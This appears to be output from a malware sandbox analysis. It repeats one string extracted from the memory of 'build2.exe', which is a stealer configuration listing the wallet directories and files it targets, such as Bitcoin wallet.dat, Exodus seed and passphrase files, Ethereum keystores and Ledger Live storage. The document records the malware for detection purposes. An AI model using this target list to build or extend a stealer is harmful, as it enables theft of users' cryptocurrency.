Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: build2.exe, 00000013.00000002.2663278860.00000000007B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
